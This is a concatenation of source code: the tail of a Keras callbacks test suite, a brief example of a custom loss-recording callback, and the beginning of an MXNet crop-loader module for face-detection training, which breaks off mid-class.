get_test_data(num_train=train_samples, num_test=test_samples, input_shape=(input_dim,), classification=True, num_classes=num_classes) y_test = np_utils.to_categorical(y_test) y_train = np_utils.to_categorical(y_train) cbks = [callbacks.TerminateOnNaN(), callbacks.CSVLogger(fp)] model = Sequential() for _ in range(5): model.add(Dense(num_hidden, input_dim=input_dim, activation='relu')) model.add(Dense(num_classes, activation='linear')) model.compile(loss='mean_squared_error', optimizer='rmsprop') def data_generator(): i = 0 max_batch_index = len(X_train) // batch_size tot = 0 while 1: if tot > 3 * len(X_train): yield np.ones([batch_size, input_dim]) * np.nan, np.ones([batch_size, num_classes]) * np.nan else: yield (X_train[i * batch_size: (i + 1) * batch_size], y_train[i * batch_size: (i + 1) * batch_size]) i += 1 tot += 1 i = i % max_batch_index history = model.fit_generator(data_generator(), len(X_train) // batch_size, validation_data=(X_test, y_test), callbacks=cbks, epochs=20) loss = history.history['loss'] assert len(loss) > 1 assert loss[-1] == np.inf or np.isnan(loss[-1]) values = [] with open(fp) as f: for x in reader(f): values.append(x) assert 'nan' in values[-1], 'The last epoch was not logged.' 
os.remove(fp) @keras_test def test_ModelCheckpoint(tmpdir): np.random.seed(1337) filepath = str(tmpdir / 'checkpoint.h5') (X_train, y_train), (X_test, y_test) = get_test_data(num_train=train_samples, num_test=test_samples, input_shape=(input_dim,), classification=True, num_classes=num_classes) y_test = np_utils.to_categorical(y_test) y_train = np_utils.to_categorical(y_train) # case 1 monitor = 'val_loss' save_best_only = False mode = 'auto' model = Sequential() model.add(Dense(num_hidden, input_dim=input_dim, activation='relu')) model.add(Dense(num_classes, activation='softmax')) model.compile(loss='categorical_crossentropy', optimizer='rmsprop', metrics=['accuracy']) cbks = [callbacks.ModelCheckpoint(filepath, monitor=monitor, save_best_only=save_best_only, mode=mode)] model.fit(X_train, y_train, batch_size=batch_size, validation_data=(X_test, y_test), callbacks=cbks, epochs=1) assert os.path.isfile(filepath) os.remove(filepath) # case 2 mode = 'min' cbks = [callbacks.ModelCheckpoint(filepath, monitor=monitor, save_best_only=save_best_only, mode=mode)] model.fit(X_train, y_train, batch_size=batch_size, validation_data=(X_test, y_test), callbacks=cbks, epochs=1) assert os.path.isfile(filepath) os.remove(filepath) # case 3 mode = 'max' monitor = 'val_acc' cbks = [callbacks.ModelCheckpoint(filepath, monitor=monitor, save_best_only=save_best_only, mode=mode)] model.fit(X_train, y_train, batch_size=batch_size, validation_data=(X_test, y_test), callbacks=cbks, epochs=1) assert os.path.isfile(filepath) os.remove(filepath) # case 4 save_best_only = True cbks = [callbacks.ModelCheckpoint(filepath, monitor=monitor, save_best_only=save_best_only, mode=mode)] model.fit(X_train, y_train, batch_size=batch_size, validation_data=(X_test, y_test), callbacks=cbks, epochs=1) assert os.path.isfile(filepath) os.remove(filepath) # case 5 save_best_only = False period = 2 mode = 'auto' filepath = 'checkpoint.{epoch:02d}.h5' cbks = [callbacks.ModelCheckpoint(filepath, monitor=monitor, save_best_only=save_best_only, mode=mode, period=period)] model.fit(X_train, y_train, batch_size=batch_size, validation_data=(X_test, y_test), callbacks=cbks, epochs=4) assert os.path.isfile(filepath.format(epoch=2)) assert os.path.isfile(filepath.format(epoch=4)) assert not os.path.exists(filepath.format(epoch=1)) assert not os.path.exists(filepath.format(epoch=3)) os.remove(filepath.format(epoch=2)) os.remove(filepath.format(epoch=4)) assert not tmpdir.listdir() @keras_test def test_EarlyStopping(): np.random.seed(1337) (X_train, y_train), (X_test, y_test) = get_test_data(num_train=train_samples, num_test=test_samples, input_shape=(input_dim,), classification=True, num_classes=num_classes) y_test = np_utils.to_categorical(y_test) y_train = np_utils.to_categorical(y_train) model = Sequential() model.add(Dense(num_hidden, input_dim=input_dim, activation='relu')) model.add(Dense(num_classes, activation='softmax')) model.compile(loss='categorical_crossentropy', optimizer='rmsprop', metrics=['accuracy']) mode = 'max' monitor = 'val_acc' patience = 0 cbks = [callbacks.EarlyStopping(patience=patience, monitor=monitor, mode=mode)] history = model.fit(X_train, y_train, batch_size=batch_size, validation_data=(X_test, y_test), callbacks=cbks, epochs=20) mode = 'auto' monitor = 'val_acc' patience = 2 cbks = [callbacks.EarlyStopping(patience=patience, monitor=monitor, mode=mode)] history = model.fit(X_train, y_train, batch_size=batch_size, validation_data=(X_test, y_test), callbacks=cbks, epochs=20) @keras_test def 
test_EarlyStopping_reuse(): np.random.seed(1337) patience = 3 data = np.random.random((100, 1)) labels = np.where(data > 0.5, 1, 0) model = Sequential(( Dense(1, input_dim=1, activation='relu'), Dense(1, activation='sigmoid'), )) model.compile(optimizer='sgd', loss='binary_crossentropy', metrics=['accuracy']) stopper = callbacks.EarlyStopping(monitor='acc', patience=patience) weights = model.get_weights() hist = model.fit(data, labels, callbacks=[stopper], epochs=20) assert len(hist.epoch) >= patience # This should allow training to go for at least `patience` epochs model.set_weights(weights) hist = model.fit(data, labels, callbacks=[stopper], epochs=20) assert len(hist.epoch) >= patience @keras_test def test_EarlyStopping_patience(): class DummyModel(object): def __init__(self): self.stop_training = False early_stop = callbacks.EarlyStopping(monitor='val_loss', patience=2) early_stop.model = DummyModel() losses = [0.0860, 0.1096, 0.1040, 0.1019] # Should stop after epoch 3, as the loss has not improved after patience=2 epochs. epochs_trained = 0 early_stop.on_train_begin() for epoch in range(len(losses)): epochs_trained += 1 early_stop.on_epoch_end(epoch, logs={'val_loss': losses[epoch]}) if early_stop.model.stop_training: break assert epochs_trained == 3 @keras_test def test_LearningRateScheduler(): np.random.seed(1337) (X_train, y_train), (X_test, y_test) = get_test_data(num_train=train_samples, num_test=test_samples, input_shape=(input_dim,), classification=True, num_classes=num_classes) y_test = np_utils.to_categorical(y_test) y_train = np_utils.to_categorical(y_train) model = Sequential() model.add(Dense(num_hidden, input_dim=input_dim, activation='relu')) model.add(Dense(num_classes, activation='softmax')) model.compile(loss='categorical_crossentropy', optimizer='sgd', metrics=['accuracy']) cbks = [callbacks.LearningRateScheduler(lambda x: 1. / (1. + x))] model.fit(X_train, y_train, batch_size=batch_size, validation_data=(X_test, y_test), callbacks=cbks, epochs=5) assert (float(K.get_value(model.optimizer.lr)) - 0.2) < K.epsilon() @keras_test def test_ReduceLROnPlateau(): np.random.seed(1337) (X_train, y_train), (X_test, y_test) = get_test_data(num_train=train_samples, num_test=test_samples, input_shape=(input_dim,), classification=True, num_classes=num_classes) y_test = np_utils.to_categorical(y_test) y_train = np_utils.to_categorical(y_train) def make_model(): np.random.seed(1337) model = Sequential() model.add(Dense(num_hidden, input_dim=input_dim, activation='relu')) model.add(Dense(num_classes, activation='softmax')) model.compile(loss='categorical_crossentropy', optimizer=optimizers.SGD(lr=0.1), metrics=['accuracy']) return model model = make_model() # This should reduce the LR after the first epoch (due to high epsilon). 
cbks = [callbacks.ReduceLROnPlateau(monitor='val_loss', factor=0.1, epsilon=10, patience=1, cooldown=5)] model.fit(X_train, y_train, batch_size=batch_size, validation_data=(X_test, y_test), callbacks=cbks, epochs=5, verbose=2) assert np.allclose(float(K.get_value(model.optimizer.lr)), 0.01, atol=K.epsilon()) model = make_model() cbks = [callbacks.ReduceLROnPlateau(monitor='val_loss', factor=0.1, epsilon=0, patience=1, cooldown=5)] model.fit(X_train, y_train, batch_size=batch_size, validation_data=(X_test, y_test), callbacks=cbks, epochs=5, verbose=2) assert np.allclose(float(K.get_value(model.optimizer.lr)), 0.1, atol=K.epsilon()) @keras_test def test_CSVLogger(tmpdir): np.random.seed(1337) filepath = str(tmpdir / 'log.tsv') sep = '\t' (X_train, y_train), (X_test, y_test) = get_test_data(num_train=train_samples, num_test=test_samples, input_shape=(input_dim,), classification=True, num_classes=num_classes) y_test = np_utils.to_categorical(y_test) y_train = np_utils.to_categorical(y_train) def make_model(): np.random.seed(1337) model = Sequential() model.add(Dense(num_hidden, input_dim=input_dim, activation='relu')) model.add(Dense(num_classes, activation='softmax')) model.compile(loss='categorical_crossentropy', optimizer=optimizers.SGD(lr=0.1), metrics=['accuracy']) return model # case 1, create new file with defined separator model = make_model() cbks = [callbacks.CSVLogger(filepath, separator=sep)] model.fit(X_train, y_train, batch_size=batch_size, validation_data=(X_test, y_test), callbacks=cbks, epochs=1) assert os.path.isfile(filepath) with open(filepath) as csvfile: dialect = Sniffer().sniff(csvfile.read()) assert dialect.delimiter == sep del model del cbks # case 2, append data to existing file, skip header model = make_model() cbks = [callbacks.CSVLogger(filepath, separator=sep, append=True)] model.fit(X_train, y_train, batch_size=batch_size, validation_data=(X_test, y_test), callbacks=cbks, epochs=1) # case 3, reuse of CSVLogger object model.fit(X_train, y_train, batch_size=batch_size, validation_data=(X_test, y_test), callbacks=cbks, epochs=1) import re with open(filepath) as csvfile: output = " ".join(csvfile.readlines()) assert len(re.findall('epoch', output)) == 1 os.remove(filepath) assert not tmpdir.listdir() @keras_test def test_TensorBoard(tmpdir): np.random.seed(np.random.randint(1, 1e7)) filepath = str(tmpdir / 'logs') (X_train, y_train), (X_test, y_test) = get_test_data( num_train=train_samples, num_test=test_samples, input_shape=(input_dim,), classification=True, num_classes=num_classes) y_test = np_utils.to_categorical(y_test) y_train = np_utils.to_categorical(y_train) def data_generator(train): if train: max_batch_index = len(X_train) // batch_size else: max_batch_index = len(X_test) // batch_size i = 0 while 1: if train: # simulate multi-input/output models yield (X_train[i * batch_size: (i + 1) * batch_size], y_train[i * batch_size: (i + 1) * batch_size]) else: yield (X_test[i * batch_size: (i + 1) * batch_size], y_test[i * batch_size: (i + 1) * batch_size]) i += 1 i = i % max_batch_index inp = Input((input_dim,)) hidden = Dense(num_hidden, activation='relu')(inp) hidden = Dropout(0.1)(hidden) output = Dense(num_classes, activation='softmax')(hidden) model = Model(inputs=inp, outputs=output) model.compile(loss='categorical_crossentropy', optimizer='sgd', metrics=['accuracy']) # we must generate new callbacks for each test, as they aren't stateless def callbacks_factory(histogram_freq): return [callbacks.TensorBoard(log_dir=filepath, histogram_freq=histogram_freq, 
write_images=True, write_grads=True, embeddings_freq=1, embeddings_layer_names=['dense_1'], batch_size=5)] # fit without validation data model.fit(X_train, y_train, batch_size=batch_size, callbacks=callbacks_factory(histogram_freq=0), epochs=3) # fit with validation data and accuracy model.fit(X_train, y_train, batch_size=batch_size, validation_data=(X_test, y_test), callbacks=callbacks_factory(histogram_freq=0), epochs=2) # fit generator without validation data model.fit_generator(data_generator(True), len(X_train), epochs=2, callbacks=callbacks_factory(histogram_freq=0)) # fit generator with validation data and accuracy model.fit_generator(data_generator(True), len(X_train), epochs=2, validation_data=(X_test, y_test), callbacks=callbacks_factory(histogram_freq=1)) assert os.path.isdir(filepath) shutil.rmtree(filepath) assert not tmpdir.listdir() @keras_test @pytest.mark.skipif((K.backend() != 'tensorflow'), reason='Requires TensorFlow backend') def test_TensorBoard_histogram_freq_must_have_validation_data(tmpdir): np.random.seed(np.random.randint(1, 1e7)) filepath = str(tmpdir / 'logs') (X_train, y_train), (X_test, y_test) = get_test_data( num_train=train_samples, num_test=test_samples, input_shape=(input_dim,), classification=True, num_classes=num_classes) y_test = np_utils.to_categorical(y_test) y_train = np_utils.to_categorical(y_train) def data_generator(train): if train: max_batch_index = len(X_train) // batch_size else: max_batch_index = len(X_test) // batch_size i = 0 while 1: if train: # simulate multi-input/output models yield (X_train[i * batch_size: (i + 1) * batch_size], y_train[i * batch_size: (i + 1) * batch_size]) else: yield (X_test[i * batch_size: (i + 1) * batch_size], y_test[i * batch_size: (i + 1) * batch_size]) i += 1 i = i % max_batch_index inp = Input((input_dim,)) hidden = Dense(num_hidden, activation='relu')(inp) hidden = Dropout(0.1)(hidden) output = Dense(num_classes, activation='softmax')(hidden) model = Model(inputs=inp, outputs=output) model.compile(loss='categorical_crossentropy', optimizer='sgd', metrics=['accuracy']) # we must generate new callbacks for each test, as they aren't stateless def callbacks_factory(histogram_freq): return [callbacks.TensorBoard(log_dir=filepath, histogram_freq=histogram_freq, write_images=True, write_grads=True, embeddings_freq=1, embeddings_layer_names=['dense_1'], batch_size=5)] # fit without validation data should raise ValueError if histogram_freq > 0 with pytest.raises(ValueError) as raised_exception: model.fit(X_train, y_train, batch_size=batch_size, callbacks=callbacks_factory(histogram_freq=1), epochs=3) assert 'validation_data must be provided' in str(raised_exception.value) # fit generator without validation data should raise ValueError if # histogram_freq > 0 with pytest.raises(ValueError) as raised_exception: model.fit_generator(data_generator(True), len(X_train), epochs=2, callbacks=callbacks_factory(histogram_freq=1)) assert 'validation_data must be provided' in str(raised_exception.value) # fit generator with validation data generator should raise ValueError if # histogram_freq > 0 with pytest.raises(ValueError) as raised_exception: model.fit_generator(data_generator(True), len(X_train), epochs=2, validation_data=data_generator(False), validation_steps=1, callbacks=callbacks_factory(histogram_freq=1)) assert 'validation_data must be provided' in str(raised_exception.value) @keras_test def test_TensorBoard_multi_input_output(tmpdir): np.random.seed(np.random.randint(1, 1e7)) filepath = str(tmpdir / 'logs') 
(X_train, y_train), (X_test, y_test) = get_test_data( num_train=train_samples, num_test=test_samples, input_shape=(input_dim,), classification=True, num_classes=num_classes) y_test = np_utils.to_categorical(y_test) y_train = np_utils.to_categorical(y_train) def data_generator(train): if train: max_batch_index = len(X_train) // batch_size else: max_batch_index = len(X_test) // batch_size i = 0 while 1: if train: # simulate multi-input/output models yield ([X_train[i * batch_size: (i + 1) * batch_size]] * 2, [y_train[i * batch_size: (i + 1) * batch_size]] * 2) else: yield ([X_test[i * batch_size: (i + 1) * batch_size]] * 2, [y_test[i * batch_size: (i + 1) * batch_size]] * 2) i += 1 i = i % max_batch_index inp1 = Input((input_dim,)) inp2 = Input((input_dim,)) inp = add([inp1, inp2]) hidden = Dense(num_hidden, activation='relu')(inp) hidden = Dropout(0.1)(hidden) output1 = Dense(num_classes, activation='softmax')(hidden) output2 = Dense(num_classes, activation='softmax')(hidden) model = Model(inputs=[inp1, inp2], outputs=[output1, output2]) model.compile(loss='categorical_crossentropy', optimizer='sgd', metrics=['accuracy']) # we must generate new callbacks for each test, as they aren't stateless def callbacks_factory(histogram_freq): return [callbacks.TensorBoard(log_dir=filepath, histogram_freq=histogram_freq, write_images=True, write_grads=True, embeddings_freq=1, embeddings_layer_names=['dense_1'], batch_size=5)] # fit without validation data model.fit([X_train] * 2, [y_train] * 2, batch_size=batch_size, callbacks=callbacks_factory(histogram_freq=0), epochs=3) # fit with validation data and accuracy model.fit([X_train] * 2, [y_train] * 2, batch_size=batch_size, validation_data=([X_test] * 2, [y_test] * 2), callbacks=callbacks_factory(histogram_freq=1), epochs=2) # fit generator without validation data model.fit_generator(data_generator(True), len(X_train), epochs=2, callbacks=callbacks_factory(histogram_freq=0)) # fit generator with validation data and accuracy model.fit_generator(data_generator(True), len(X_train), epochs=2, validation_data=([X_test] * 2, [y_test] * 2), callbacks=callbacks_factory(histogram_freq=1)) assert os.path.isdir(filepath) shutil.rmtree(filepath) assert not tmpdir.listdir() @keras_test def test_TensorBoard_convnet(tmpdir): np.random.seed(np.random.randint(1, 1e7)) filepath = str(tmpdir / 'logs') input_shape = (16, 16, 3) (x_train, y_train), (x_test, y_test) = get_test_data(num_train=500, num_test=200, input_shape=input_shape, classification=True, num_classes=num_classes) y_train = np_utils.to_categorical(y_train) y_test = np_utils.to_categorical(y_test) model = Sequential([ Conv2D(filters=8, kernel_size=3, activation='relu', input_shape=input_shape), MaxPooling2D(pool_size=2), Conv2D(filters=4, kernel_size=(3, 3), activation='relu', padding='same'), GlobalAveragePooling2D(), Dense(num_classes, activation='softmax') ]) model.compile(loss='categorical_crossentropy', optimizer='rmsprop', metrics=['accuracy']) tsb = callbacks.TensorBoard(log_dir=filepath, histogram_freq=1, write_images=True, write_grads=True, batch_size=16) cbks = [tsb] model.summary() history = model.fit(x_train, y_train, epochs=2, batch_size=16, validation_data=(x_test, y_test), callbacks=cbks, verbose=0) assert os.path.isdir(filepath) shutil.rmtree(filepath) assert not tmpdir.listdir() @keras_test def test_CallbackValData(): np.random.seed(1337) (X_train, y_train), (X_test, y_test) = get_test_data(num_train=train_samples, num_test=test_samples, input_shape=(input_dim,), classification=True, 
num_classes=num_classes) y_test = np_utils.to_categorical(y_test) y_train = np_utils.to_categorical(y_train) model = Sequential() model.add(Dense(num_hidden, input_dim=input_dim, activation='relu')) model.add(Dense(num_classes, activation='softmax')) model.compile(loss='categorical_crossentropy', optimizer='sgd', metrics=['accuracy']) cbk = callbacks.LambdaCallback(on_train_end=lambda x: 1) model.fit(X_train, y_train, batch_size=batch_size, validation_data=(X_test, y_test), callbacks=[cbk], epochs=1) def data_generator(train): if train: max_batch_index = len(X_train) // batch_size else: max_batch_index = len(X_test) // batch_size i = 0 while 1: if train: yield (X_train[i * batch_size: (i + 1) * batch_size], y_train[i * batch_size: (i + 1) * batch_size]) else: yield (X_test[i * batch_size: (i + 1) * batch_size], y_test[i * batch_size: (i + 1) * batch_size]) i += 1 i = i % max_batch_index cbk2 = callbacks.LambdaCallback(on_train_end=lambda x: 1) model.fit_generator(data_generator(True), len(X_train), epochs=1, validation_data=(X_test, y_test), callbacks=[cbk2]) # callback validation data should always have x, y, and sample weights assert len(cbk.validation_data) == len(cbk2.validation_data) == 3 assert cbk.validation_data[0] is cbk2.validation_data[0] assert cbk.validation_data[1] is cbk2.validation_data[1] assert cbk.validation_data[2].shape == cbk2.validation_data[2].shape @keras_test def test_LambdaCallback(): np.random.seed(1337) (X_train, y_train), (X_test, y_test) = get_test_data(num_train=train_samples, num_test=test_samples, input_shape=(input_dim,), classification=True, num_classes=num_classes) y_test = np_utils.to_categorical(y_test) y_train = np_utils.to_categorical(y_train) model = Sequential() model.add(Dense(num_hidden, input_dim=input_dim, activation='relu')) model.add(Dense(num_classes, activation='softmax')) model.compile(loss='categorical_crossentropy', optimizer='sgd', metrics=['accuracy']) # Start an arbitrary process that should run during model training and be terminated after training has completed. 
def f(): while True: pass p = multiprocessing.Process(target=f) p.start() cleanup_callback = callbacks.LambdaCallback(on_train_end=lambda logs: p.terminate()) cbks = [cleanup_callback] model.fit(X_train, y_train, batch_size=batch_size, validation_data=(X_test, y_test), callbacks=cbks, epochs=5) p.join() assert not p.is_alive() @keras_test def test_TensorBoard_with_ReduceLROnPlateau(tmpdir): import shutil np.random.seed(np.random.randint(1, 1e7)) filepath = str(tmpdir / 'logs') (X_train, y_train), (X_test, y_test) = get_test_data(num_train=train_samples, num_test=test_samples, input_shape=(input_dim,), classification=True, num_classes=num_classes) y_test = np_utils.to_categorical(y_test) y_train = np_utils.to_categorical(y_train) model = Sequential() model.add(Dense(num_hidden, input_dim=input_dim, activation='relu')) model.add(Dense(num_classes, activation='softmax')) model.compile(loss='binary_crossentropy', optimizer='sgd', metrics=['accuracy']) cbks = [ callbacks.ReduceLROnPlateau( monitor='val_loss', factor=0.5, patience=4, verbose=1), callbacks.TensorBoard( log_dir=filepath)] model.fit(X_train, y_train, batch_size=batch_size, validation_data=(X_test, y_test), callbacks=cbks, epochs=2) assert os.path.isdir(filepath) shutil.rmtree(filepath) assert not tmpdir.listdir() @keras_test def tests_RemoteMonitor(): (X_train, y_train), (X_test, y_test) = get_test_data(num_train=train_samples, num_test=test_samples, input_shape=(input_dim,), classification=True, num_classes=num_classes) y_test = np_utils.to_categorical(y_test) y_train = np_utils.to_categorical(y_train) model = Sequential() model.add(Dense(num_hidden, input_dim=input_dim, activation='relu')) model.add(Dense(num_classes, activation='softmax')) model.compile(loss='categorical_crossentropy', optimizer='rmsprop', metrics=['accuracy']) cbks = [callbacks.RemoteMonitor()] with patch('requests.post'): model.fit(X_train, y_train, batch_size=batch_size, validation_data=(X_test, y_test), callbacks=cbks, epochs=1) if __name__ == '__main__': pytest.main([__file__])
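The suite above exercises the built-in callbacks; for contrast, a custom callback against the same Keras 2 API is only a small subclass of callbacks.Callback. The sketch below (LossHistory is an illustrative name, not part of these tests) records the training loss reported at the end of every epoch.

import numpy as np
from keras import callbacks
from keras.models import Sequential
from keras.layers import Dense

class LossHistory(callbacks.Callback):
    def on_train_begin(self, logs=None):
        self.losses = []

    def on_epoch_end(self, epoch, logs=None):
        # logs carries the metrics computed for this epoch (loss, acc, ...)
        self.losses.append(logs.get('loss'))

x = np.random.random((32, 2))
y = np.random.randint(0, 2, size=(32, 1))
model = Sequential([Dense(4, input_dim=2, activation='relu'),
                    Dense(1, activation='sigmoid')])
model.compile(loss='binary_crossentropy', optimizer='sgd')
history_cb = LossHistory()
model.fit(x, y, epochs=3, batch_size=8, callbacks=[history_cb], verbose=0)
print(history_cb.losses)  # one loss value per epoch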
loader.py
from __future__ import print_function
import sys
import mxnet as mx
import numpy as np
import random
import datetime
import multiprocessing
import cv2
from mxnet.executor_manager import _split_input_slice
from rcnn.config import config
from rcnn.io.image import tensor_vstack
from rcnn.io.rpn import get_rpn_testbatch, get_rpn_batch, assign_anchor_fpn, get_crop_batch, AA


class CropLoader(mx.io.DataIter):
    def __init__(self, feat_sym, roidb, batch_size=1, shuffle=False, ctx=None, work_load_list=None, aspect_grouping=False):
        """
        This Iter will provide roi data to Fast R-CNN network
        :param feat_sym: to infer shape of assign_output
        :param roidb: must be preprocessed
        :param batch_size: must divide BATCH_SIZE(128)
        :param shuffle: bool
        :param ctx: list of contexts
        :param work_load_list: list of work load
        :param aspect_grouping: group images with similar aspects
        :return: AnchorLoader
        """
        super(CropLoader, self).__init__()

        # save parameters as properties
        self.feat_sym = feat_sym
        self.roidb = roidb
        self.batch_size = batch_size
        self.shuffle = shuffle
        self.ctx = ctx
        if self.ctx is None:
            self.ctx = [mx.cpu()]
        self.work_load_list = work_load_list
        #self.feat_stride = feat_stride
        #self.anchor_scales = anchor_scales
        #self.anchor_ratios = anchor_ratios
        #self.allowed_border = allowed_border
        self.aspect_grouping = aspect_grouping
        self.feat_stride = config.RPN_FEAT_STRIDE

        # infer properties from roidb
        self.size = len(roidb)
        self.index = np.arange(self.size)

        # decide data and label names
        #self.data_name = ['data']
        #self.label_name = []
        #self.label_name.append('label')
        #self.label_name.append('bbox_target')
        #self.label_name.append('bbox_weight')
        self.data_name = ['data']
        #self.label_name = ['label', 'bbox_target', 'bbox_weight']
        self.label_name = []
        prefixes = ['face']
        if config.HEAD_BOX:
            prefixes.append('head')
        names = []
        for prefix in prefixes:
            #names += [prefix+'_label', prefix+'_bbox_anchor', prefix+'_bbox_target', prefix+'_bbox_weight']
            names += [prefix+'_label', prefix+'_bbox_target', prefix+'_bbox_weight']
            if prefix=='face' and config.FACE_LANDMARK:
                names += [prefix+'_landmark_target', prefix+'_landmark_weight']
        #names = ['label', 'bbox_weight']
        for stride in self.feat_stride:
            for n in names:
                k = "%s_stride%d"%(n,stride)
                self.label_name.append(k)

        # status variable for synchronization between get_data and get_label
        self.cur = 0
        self.batch = None
        self.data = None
        self.label = None

        # infer shape
        feat_shape_list = []
        _data_shape = [('data', (1, 3, max([v[1] for v in config.SCALES]), max([v[1] for v in config.SCALES])))]
        _data_shape = dict(_data_shape)
        for i in range(len(self.feat_stride)):
            _, feat_shape, _ = self.feat_sym[i].infer_shape(**_data_shape)
            feat_shape = [int(i) for i in feat_shape[0]]
            feat_shape_list.append(feat_shape)
        self.aa = AA(feat_shape_list)

        self._debug = False
        self._debug_id = 0
        self._times = [0.0, 0.0, 0.0, 0.0]

        # get first batch to fill in provide_data and provide_label
        self.reset()
        self.get_batch()

    @property
    def provide_data(self):
        return [(k, v.shape) for k, v in zip(self.data_name, self.data)]

    @property
    def provide_label(self):
        return [(k, v.shape) for k, v in zip(self.label_name, self.label)]

    def reset(self):
        self.cur = 0
        if self.shuffle:
            np.random.shuffle(self.index)

    def iter_next(self):
        return self.cur + self.batch_size <= self.size

    def next(self):
        if self.iter_next():
            self.get_batch()
            self.cur += self.batch_size
            return mx.io.DataBatch(data=self.data, label=self.label,
                                   pad=self.getpad(), index=self.getindex(),
                                   provide_data=self.provide_data, provide_label=self.provide_label)
        else:
            raise StopIteration

    def getindex(self):
        return self.cur / self.batch_size

    def getpad(self):
        if self.cur + self.batch_size > self.size:
            return self.cur + self.batch_size - self.size
        else:
            return 0

    def infer_shape(self, max_data_shape=None, max_label_shape=None):
        """ Return maximum data and label shape for single gpu """
        if max_data_shape is None:
            max_data_shape = []
        if max_label_shape is None:
            max_label_shape = []
        max_shapes = dict(max_data_shape + max_label_shape)
        input_batch_size = max_shapes['data'][0]
        dummy_boxes = np.zeros((0, 5))
        dummy_info = [ [max_shapes['data'][2], max_shapes['data'][3], 1.0] ]
        dummy_label = {'gt_boxes' : dummy_boxes}
        dummy_blur = np.zeros((0,))
        dummy_label['gt_blur'] = dummy_blur

        label_dict = {}
        if config.HEAD_BOX:
            head_label_dict = self.aa.assign_anchor_fpn(dummy_label, dummy_info, False, prefix='head')
            label_dict.update(head_label_dict)
        if config.FACE_LANDMARK:
            dummy_landmarks = np.zeros( (0,5,3) )
            dummy_label['gt_landmarks'] = dummy_landmarks
        face_label_dict = self.aa.assign_anchor_fpn(dummy_label, dummy_info, config.FACE_LANDMARK, prefix='face')
        label_dict.update(face_label_dict)
        label_list = []
        for k in self.label_name:
            label_list.append(label_dict[k])
        label_shape = [(k, tuple([input_batch_size] + list(v.shape[1:]))) for k, v in zip(self.label_name, label_list)]
        print(label_shape)
        return max_data_shape, label_shape

    def get_batch(self):
        # slice roidb
        cur_from = self.cur
        cur_to = min(cur_from + self.batch_size, self.size)
        assert cur_to == cur_from + self.batch_size
        roidb = [self.roidb[self.index[i]] for i in range(cur_from, cur_to)]

        # decide multi device slice
        work_load_list = self.work_load_list
        ctx = self.ctx
        if work_load_list is None:
            work_load_list = [1] * len(ctx)
        assert isinstance(work_load_list, list) and len(work_load_list) == len(ctx), \
            "Invalid settings for work load. "
        slices = _split_input_slice(self.batch_size, work_load_list)

        # get testing data for multigpu
        data_list = []
        label_list = []
        for islice in slices:
            iroidb = [roidb[i] for i in range(islice.start, islice.stop)]
            data, label = get_crop_batch(iroidb)
            data_list += data
            label_list += label
            #data_list.append(data)
            #label_list.append(label)

        # pad data first and then assign anchor (read label)
        #data_tensor = tensor_vstack([batch['data'] for batch in data_list])
        #for i_card in range(len(data_list)):
        #    data_list[i_card]['data'] = data_tensor[
        #        i_card * config.TRAIN.BATCH_IMAGES:(1 + i_card) * config.TRAIN.BATCH_IMAGES]

        #iiddxx = 0
        select_stride = 0
        if config.RANDOM_FEAT_STRIDE:
            select_stride = random.choice(config.RPN_FEAT_STRIDE)

        for data, label in zip(data_list, label_list):
            data_shape = {k: v.shape for k, v in data.items()}
            del data_shape['im_info']

            feat_shape_list = []
            for s in range(len(self.feat_stride)):
                _, feat_shape, _ = self.feat_sym[s].infer_shape(**data_shape)
                feat_shape = [int(i) for i in feat_shape[0]]
                feat_shape_list.append(feat_shape)

            im_info = data['im_info']
            gt_boxes = label['gt_boxes']
            gt_label = {'gt_boxes': gt_boxes}
            if config.USE_BLUR:
                gt_blur = label['gt_blur']
                gt_label['gt_blur'] = gt_blur
            if self._debug:
                img = data['data'].copy()[0].transpose( (1,2,0) )[:,:,::-1].copy()
                print('DEBUG SHAPE', data['data'].shape, label['gt_boxes'].shape)
                box = label['gt_boxes'].copy()[0][0:4].astype(np.int)
                cv2.rectangle(img, (box[0], box[1]), (box[2], box[3]), (0, 255, 0), 2)
                filename = './debugout/%d.png' % (self._debug_id)
                print('debug write', filename)
                cv2.imwrite(filename, img)
                self._debug_id += 1
                #print('DEBUG', img.shape, bbox.shape)

            label_dict = {}
            if config.HEAD_BOX:
                head_label_dict = self.aa.assign_anchor_fpn(gt_label, im_info, False, prefix='head', select_stride = select_stride)
                label_dict.update(head_label_dict)
            if config.FACE_LANDMARK:
                gt_landmarks = label['gt_landmarks']
                gt_label['gt_landmarks'] = gt_landmarks
            #ta = datetime.datetime.now()
            #face_label_dict = assign_anchor_fpn(feat_shape_list, gt_label, im_info, config.FACE_LANDMARK, prefix='face', select_stride = select_stride)
            face_label_dict = self.aa.assign_anchor_fpn(gt_label, im_info, config.FACE_LANDMARK, prefix='face', select_stride = select_stride)
            #tb = datetime.datetime.now()
            #self._times[0] += (tb-ta).total_seconds()
            label_dict.update(face_label_dict)
            #print('im_info', im_info.shape)
            #print(gt_boxes.shape)

            for k in self.label_name:
                label[k] = label_dict[k]

        all_data = dict()
        for key in self.data_name:
            all_data[key] = tensor_vstack([batch[key] for batch in data_list])

        all_label = dict()
        for key in self.label_name:
            pad = 0 if key.startswith('bbox_') else -1
            #print('label vstack', key, pad, len(label_list), file=sys.stderr)
            all_label[key] = tensor_vstack([batch[key] for batch in label_list], pad=pad)

        self.data = [mx.nd.array(all_data[key]) for key in self.data_name]
        self.label = [mx.nd.array(all_label[key]) for key in self.label_name]
        #print(self._times)


class CropLoader2(mx.io.DataIter):
    def __init__(self, feat_sym, roidb, batch_size=1, shuffle=False, ctx=None, work_load_list=None, aspect_grouping=False):
        """
        This Iter will provide roi data to Fast R-CNN network
        :param feat_sym: to infer shape of assign_output
        :param roidb: must be preprocessed
        :param batch_size: must divide BATCH_SIZE(128)
        :param shuffle: bool
        :param ctx: list of contexts
        :param work_load_list: list of work load
        :param aspect_grouping: group images with similar aspects
        :return: AnchorLoader
        """
        super(CropLoader2, self).__init__()

        # save parameters as properties
        self.feat_sym = feat_sym
        self.roidb = roidb
        self.batch_size = batch_size
        self.shuffle = shuffle
        self.ctx = ctx
        if self.ctx is None:
            self.ctx = [mx.cpu()]
        self.work_load_list = work_load_list
        #self.feat_stride = feat_stride
        #self.anchor_scales = anchor_scales
        #self.anchor_ratios = anchor_ratios
        #self.allowed_border = allowed_border
        self.aspect_grouping = aspect_grouping
        self.feat_stride = config.RPN_FEAT_STRIDE

        # infer properties from roidb
        self.size = len(roidb)

        # decide data and label names
        #self.data_name = ['data']
        #self.label_name = []
        #self.label_name.append('label')
        #self.label_name.append('bbox_target')
        #self.label_name.append('bbox_weight')
